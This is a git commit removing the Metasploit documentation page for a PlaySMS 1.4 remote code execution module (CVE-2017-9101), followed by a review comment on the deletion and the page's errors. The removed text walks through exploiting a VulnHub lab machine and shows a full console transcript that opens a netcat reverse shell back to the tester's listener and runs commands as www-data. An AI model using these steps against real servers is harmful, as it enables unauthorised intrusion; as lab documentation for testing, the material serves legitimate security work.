Delete playsms_uploadcsv_exec.md

GSoC/Meterpreter_Web_Console
Touhid M Shaikh 2018-03-18 13:57:04 +05:30 committed by GitHub
parent 0e0fcdf727
commit 0817e6b15f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 159 deletions


@ -1,159 +0,0 @@
## Description
import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header
and PHP code in the name of a file.
CVE ID : CVE-2017-9101
## Vulnerable Application
According To publicly exploit Disclosure of PlaySMS 1.4
this application is vulnerable to 'import.php' Remote Code Execution
read more : https://www.exploit-db.com/exploits/42044/
**Vulnerable Application Link**
https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
## Vulnerable Application Installation Setup.
Download Application : ```wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz```
Extract..
Move In WebDirectory : ```mv playsms-1.4/web/* /var/www/html/```
Change Owner : ```chown -R www-data:www-data /var/www/html/```
Set DB creds in Config File. And dump playsms-1.4/db/playsms.sql in your playsms database.
Now Visit.
Vulnhub machine : https://www.vulnhub.com/entry/dina-101,200/
**And Follow Clipbucket Installer**
Visit : http://localhost/
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/unix/http/playsms_uploadcsv_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `set targeturi SecreTSMSgatwayLogin`
6. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
7. Do: `set lport <port>`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
## Options
**TARGETURI**
TARGETURI by default is `/`, however it can be changed.
## Scenarios
**TESTED AGAINST LINUX**
```
msf auxiliary(scanner/smb/smb_enum_gpp) > use exploit/unix/http/playsms_uploadcsv_exec
msf exploit(unix/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(unix/http/playsms_uploadcsv_exec) > set rhost 10.22.1.10
rhost => 10.22.1.10
msf exploit(unix/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(unix/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(unix/http/playsms_uploadcsv_exec) > set lhost 10.22.1.9
lhost => 10.22.1.9
msf exploit(unix/http/playsms_uploadcsv_exec) > show options
Module options (exploit/unix/http/playsms_uploadcsv_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD diana yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.22.1.10 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI SecreTSMSgatwayLogin yes Base playsms directory path
USERNAME touhid yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.22.1.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PlaySMS 1.4
msf exploit(unix/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.10:80 The target appears to be vulnerable.
msf exploit(unix/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.9:4444
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[*] Trying to upload malicious CSV file ....
[*] Command shell session 1 opened (10.22.1.9:4444 -> 10.22.1.10:57706) at 2018-03-18 13:10:24 +0530
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
^Z
Background session 1? [y/N] y
msf exploit(unix/http/playsms_uploadcsv_exec) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.22.1.9:4444 -> 10.22.1.10:57706 (10.22.1.10)
msf exploit(unix/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(unix/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.9:4444
[+] X-CSRF-Token for login : cf6f56ccf44e26d046ed153319340c14
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 7bd4ffbe733ecaa9bea1c5dce9e040e7
[*] Trying to upload malicious CSV file ....
[*] Command shell session 2 opened (10.22.1.9:4444 -> 10.22.1.10:57711) at 2018-03-18 13:17:09 +0530
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
ls -la
total 52
drwxr-xr-x 6 root root 4096 Oct 17 19:09 .
drwxr-xr-x 9 root root 4096 Oct 17 20:51 ..
-rw-r--r-- 1 root root 2908 Oct 17 19:08 config-dist.php
-rw-r--r-- 1 root root 2903 Oct 17 19:11 config.php
drwxr-xr-x 3 root root 4096 Oct 17 19:08 inc
-rw-r--r-- 1 root root 3205 Oct 17 19:08 index.php
-rw-r--r-- 1 root root 13463 Oct 17 19:08 init.php
drwxr-xr-x 3 root root 4096 Oct 17 19:08 lib
drwxr-xr-x 7 root root 4096 Oct 17 19:08 plugin
drwxr-xr-x 3 root root 4096 Oct 17 19:08 storage
```
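Review bot: deleting this file outright leaves exploit/unix/http/playsms_uploadcsv_exec with no documentation and the commit message gives no reason; if the intent is to move it (for example next to the module's other docs), do the rename in the same commit so history follows the file, and say so in the message. This also lands on the GSoC/Meterpreter_Web_Console branch, which has nothing to do with a PlaySMS module, so confirm it is not an accidental drop of work merged elsewhere. If the file is being removed because of its content, the defects visible here are the ones to fix in a rewrite rather than a reason to delete: the Options section says `TARGETURI by default is /` while every example sets `SecreTSMSgatwayLogin`, a path specific to the Dina VulnHub image that should be described as such; the setup section says `And Follow Clipbucket Installer`, which refers to a different application; step `6.` appears twice in the Verification Steps; and USERNAME and PASSWORD are required options that are never listed under Options even though the Scenarios transcript shows authentication (`Authentication successful: touhid:diana`) must succeed before the CSV upload.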